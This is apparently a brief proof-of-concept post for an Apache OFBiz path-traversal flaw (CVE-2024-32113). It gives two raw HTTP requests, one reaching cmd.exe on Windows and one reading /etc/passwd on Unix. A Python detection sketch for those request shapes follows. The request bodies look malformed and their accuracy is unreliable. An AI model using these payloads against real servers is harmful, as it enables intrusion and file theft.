CVE-2024-32113 Apache-OFBiz
POC for Windows
POST /webtools/control/xmlrpc HTTP/1.1
Host: vulnerable-host.com
Content-Type: text/xml
performCommand ../../../../../../windows/system32/cmd.exe?/c+dir+c:\
POC for *NIX
POST /webtools/control/xmlrpc HTTP/1.1
Host: vulnerable-host.com
Content-Type: text/xml
example.createBlogPost ../../../../../../etc/passwd
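Detection sketch for the request shape shown above, as an added example that is not part of the original post: it flags POSTs to the XML-RPC endpoint whose body carries directory-traversal sequences, including URL-encoded and double-encoded forms. The function names, the finding labels and the sample requests are assumptions made for illustration.

```python
import re
from urllib.parse import unquote

# Endpoint taken from the requests on this page.
XMLRPC_PATH = "/webtools/control/xmlrpc"
# Two or more consecutive "../" or "..\" segments.
TRAVERSAL = re.compile(r"(?:\.\.[/\\]){2,}")
# Targets seen in the page's payloads; extend for your environment.
SENSITIVE = re.compile(r"(?:etc/passwd|system32[/\\]cmd\.exe)", re.I)


def normalise(text, rounds=3):
    """URL-decode repeatedly so %2e%2e%2f and double-encoded forms are caught."""
    for _ in range(rounds):
        decoded = unquote(text)
        if decoded == text:
            break
        text = decoded
    return text


def inspect_request(method, path, body):
    """Return a list of findings for one HTTP request; empty means clean."""
    endpoint = normalise(path).split("?")[0].rstrip("/")
    if method.upper() != "POST" or endpoint != XMLRPC_PATH:
        return []
    findings = []
    decoded = normalise(body)
    if TRAVERSAL.search(decoded):
        findings.append("traversal-sequence")
    if SENSITIVE.search(decoded):
        findings.append("sensitive-target")
    return findings


# Constructed sample requests: the Windows body from this page, a shortened
# URL-encoded variant of the *NIX body, and a benign call for contrast.
SAMPLES = [
    ("POST", "/webtools/control/xmlrpc",
     "performCommand ../../../../../../windows/system32/cmd.exe?/c+dir+c:\\"),
    ("POST", "/webtools/control/xmlrpc",
     "example.createBlogPost %2e%2e%2f%2e%2e%2fetc/passwd"),
    ("POST", "/webtools/control/xmlrpc", "example.ping hello"),
]

if __name__ == "__main__":
    for method, path, body in SAMPLES:
        print(body[:40], "->", inspect_request(method, path, body) or "clean")
```

The same two patterns can be carried into a WAF or reverse-proxy rule scoped to the XML-RPC endpoint, applied after the request body has been URL-decoded.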